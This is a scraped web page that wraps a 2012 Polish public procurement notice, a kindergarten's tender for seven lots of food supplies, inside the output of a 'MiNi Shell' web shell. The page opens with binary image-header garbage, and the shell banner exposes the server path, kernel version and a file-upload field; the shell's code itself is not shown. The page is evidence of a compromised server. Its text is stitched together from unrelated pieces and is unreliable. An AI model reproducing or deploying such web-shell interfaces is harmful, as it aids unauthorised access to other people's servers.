JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121123/468728-N-2012.html

<p class="kh_header"><b>Piława Górna: Dostawa artykułów żywnościowych do przedszkola</b><br>
<b>Numer ogłoszenia: 468728 - 2012; data zamieszczenia: 23.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Publiczne , ul. A. Mickiewicza 5, 58-240 Piława Górna, woj. dolnośląskie, tel. 74 8371218, faks 74 8371218.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do przedszkola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów żywności do przedszkola wg grup: 1. Produkty mleczarskie 2. Pieczywo, świeże wyroby piekarskie 3. Świeże mięso i wędliny 4. Świeże warzywa, owoce i jaja 5. Inne produkty spożywcze 6. Produkty mrożone. 7. Wyroby ciastkarskie i ciasta.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania z mocy art. 22 ust. 1 ustawy PZP- Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu metodą warunku granicznego spełnia/nie spełnia w oparciu o załączone oświadczenie zał. nr 3 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy wg wzoru - załącznik nr 1 do SIWZ 2) Oświadczenie, że Wykonawca zapoznał się z warunkami przetargu określonymi w SIWZ i przyjmuje je bez zastrzeżeń 3) Zaakceptowany (zaparafowany) projekt umowy przez osobę upoważnioną do reprezentowania Wykonawcy wg wzoru - załącznik nr 5 do SIWZ. 4) Wypełniony wykaz zamawianych towarów wg załącznika nr 2 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przedszkolepilawa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Publiczne w Piławie Górnej 58-240 Piława Górna, ul. Adama Mickiewicza 5..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2012 godzina 09:00, miejsce: Przedszkole Publiczne w Piławie Górnej 58-240 Piława Górna, ul. Adama Mickiewicza 5 (w gabinecie dyrektora)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 31.12.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty mleczarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Produkty mleczarskie - Załącznik nr 2/1 do SIZW Mleko 2%, 1 litr szt. 1800, Masło 200 g Mazurskie szt. 800, Twaróg półtłusty Rawicz kg 200, Ser żółty (salami i edamski) Chojnice kg 40, Serek topiony Hochland szt. 40, Margaryna Palma kg 25, Masło roślinne 250g kg 30, Śmietana 18% 400 ml Piątnica szt. 800, Jogurt owocowy 150g szt. 1000, Serek homogenizowany owocowy (mix) Danio szt. 700, Pudding 4x100g Zott szt. 300, Jogurt naturalny 150g szt.50, Jogurt pitny mleczno-owocowy Actimel szt.620.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Pieczywo, świeże wyroby piekarskie - Załącznik nr 2/2 do SIZW Chleb zwykły krojony 550 g szt. 1500, Bułka razowa 60 g szt. 500, Bułka słodka 80 g szt. 400, Bułka zwykła 80 g szt. 500, Chleb razowy 500 g szt. 800 Rogal 80 g szt. 600, Chałka 300g szt. 60, Bułka zwykła 60g szt. 100, Chleb tostowy szt.20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świeże mięso i wędliny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Świeże mięso i wędliny - Załącznik nr 2/3 do SIZW Antrykot kg 50, Żeberka wp. kg 10, Karczek bez kości kg 60, Kurczak kg 60, Wołowina extra kg 20, Wołowina na pieczeń kg 30, Łopatka b/k kg 80, Szynka b/k kg 50, Udko z kurczaka kg 15, Schab b/k kg 120, Filet z kurczaka kg 87, Wątroba wieprzowa kg 20, Kiełbasa zwyczajna kg 60, Kiełbasa śląska kg 50, Kiełbasa wiejska kg 10, Kiełbasa swojska kg 10, Parówki wieprzowe z szynki kg 30, Kiełbasa szynkowa kg 5, Kiełbasa krakowska kg 5,  Szynka wieprzowa kg 17,  Polędwica wieprzowa pieczona kg 10, Polędwica drobiowa kg 10, Szynka drobiowa kg 8 Schab pieczony kg 10,  Polędwica sopocka kg 10, Polędwica z piersi kurczaka kg 8, filety z indyka kg 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świeże warzywa owoce i jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - Świeże warzywa owoce i jaja - Załącznik nr 2/4 do SIZW Banany kg 300, Buraki kg 150, Cebula kg 180, Cytryna kg 30, Fasola kg 10, Groch kg 10, Jabłka kg 700, Kalafior szt. 50, Kapusta biała kg 80, Kapusta czerwona kg 40, Kapusta kiszona kg 180, Kapusta włoska szt. 30, Kapusta pekińska kg 40, Mandarynki kg 90, Marchewka kg 300, Ogórek kg 90, Papryka czerwona kg 40, Pieczarki kg 10, Pietruszka - korzeń kg 20, Pomidor kg 20, Pomarańcze kg 80, Por szt. 50, Rzodkiewka szt. 90, Sałata szt. 80, Seler kg 30, Szczypiorek szt. 190, Śliwki kg 5,  Truskawki kg 30 Ziemniaki kg 3500, Botwinka - pęczki szt. 10, Brukselka kg 5, Brzoskwinie kg 20, Fasolka szparagowa kg 10, Koperek - pęczek szt. 50, Natka pietruszki - pęczek szt. 100, Nektarynka kg 60, Jajka kurze XL szt. 2000, Winogrona kg 60, Kapusta młoda szt. 50..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Inne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - Inne produkty spożywcze - Załącznik nr 2/5 do SIZW Ananasy w puszce szt.100, Barszcz biały Winiary szt. 150, Brzoskwinie w puszce szt. 400, Bułka tarta 500 g Mamut szt. 100, Chrupki kukurydziane szt. 80, Suszone plasterki jabłka 20g szt. 400, Cukier biały 1 kg 300, Cukier puder 500 g kg 5, Cukier wanilinowy 16 g szt. 60, Cukierki owocowe kg 8, Czosnek granulowany szt. 5,  Drożdze 100 g szt. 35, Dżem słoik (mix) 280 g szt. 80, Galaretka 75 g Winiary szt. 50, Groszek konserwowy 400 g szt. 40, Herbata ekspresowa 100 g szt. 50, Herbata owocowa szt. 20, Kakao 100 g szt. 10, Kasza jęczmienna kg 10, Kasza jęczmienna w woreczkach 4 x 100 g szt. 80, Kasza manna 500 g szt. 15, Kawa zbożowa w torebkach 147 g szt. 40, Keczup 500g szt.10, Kisiel Winiary szt. 150, Koncentrat pomidorowy 200 g Pudliszki szt. 100, Konserwa mięsna 400 g szt. 80, Konserwa rybna w pomidorach 180g (makrela, śledź) szt 80, Kostka mięsna (przyprawa) szt. 10, Krem czekoladowy Nutella 630 g szt. 15, Sok marchwiowo-owocowy 900 ml Kubuś szt. 350, Napój owocowy 150 ml szt. 60, Przyprawa warzywna Kuchrek 200 g szt. 60, Kukurydza 500 g szt. 50, Kwasek cytrynowy 20g szt. 10, Liść laurowy szt. 10, Przyprawa w płynie do zup 960 g szt. 10, Majeranek szt. 10, Majonez 400ml Świdnicki szt.20,  Makaron świderki 400 g Węgierski szt. 260, Makaron łazanka 400 g Węgierski szt. 80, Makaron nitka 400 g Węgierski szt. 80, Makaron zacierka 250 g szt. 100, Papryka konserwowa 650g szt 10, Papryka w proszku szt.20, Pasta rybna 120g szt. 100,  Pasztet drobiowy 120 g szt. 100, Pieprz mielony 20g szt 30, Płatki śniadaniowe kukurydziane 250 g szt 10, Płatki śniadaniowe czekoladowe kulki 250 g szt. 20, Płatki śniadaniowe miodowe 250 g szt.20, Płatki śniadaniowe czekoladowe 225 g Cookie Crisp szt 20, Płatki śniadaniowe z miodem i orzeszkami 225 g szt.20,  Mąka tortowa typ 405 kg 160, Mąka ziemniaczana kg 8, Miód prawdziwy wielokwiat. 370 g szt. 10, Musztarda stołowa 170 g szt. 30, Ogórek konserwowy 880 g szt. 100, Olej rzepakowy 1 l Kujawski szt. 120, Przecier ogórkowy 300 g szt. 70, Przyprawa do gyrosa szt. 10,  Rosołek drobiowy 120 g szt. 110, Ryż kg 40, Ryż w woreczkach 4 x 100 g szt. 150, Sos pomidorowy do makaronu Winiary szt. 120, Sól kg 130, Syrop (mix) 420 g Pińczów szt. 500,  Przecier szczawiowy 300 g szt. 60, Woda mineralna niegazowana 5 l szt. 40, Ziele angielskie szt. 10, Pierniczki w czekoladzie 60g szt. 150, Czekolada mleczna 100g szt. 150, Draże 80g szt. 150, Guma rozpuszczalna szt.150, Herbatniki w czekoladzie 79g szt. 150, Karmelki kg 5, Cukierki czekoladowe Michałki kg 6, Lizak 8g szt. 150, Mikołaj z czekolady 60g szt. 150, Rogal z nadzieniem czekoladowym szt. 150, Wafel Knoppers szt.150, Żelki 100g szt. 149, Biszkopty 120g szt.200, Biszkopty 150g Delicje szt.50, Wafelki w czekoladzie szt 150, Herbatniki maślane 180g szt. 250, Jajko czekoladowe wielkanocne szt.600, Jajko niespodzianka szt.200, Baton mledczny 50g szt. 150, Paluszki słone 300g szt.150, Baton czekoladowy Snikers szt. 120, Wafel w białej polewie 36g szt. 129.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI - Produkty mrożone - Załącznik nr 2/6 do SIZW Mrożonka -marchewka kostka 2,5 kg szt. 10, Mrożonka - włoszczyzna 2,5 kg szt. 200 Mrożonka - truskawki 2,5 kg szt. 5, Mrożonka - fasolka szparagowa 2,5 kg szt. 5, Mrożonka - kalafior 2,5 kg szt. 10, Mintaj kg 90, Morszczuk kg 30 Dorsz kg 50, Miruna kg 40..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wyroby ciastkarskie i ciasta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII - Wyroby ciastkarskie i ciasta- Załącznik nr 2/7 do SIZW - Pączki szt. 270, Ciastka tortowe szt.150, Ciasto jogurtowe kg 5, Ciasto drożdżowe kg 15,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com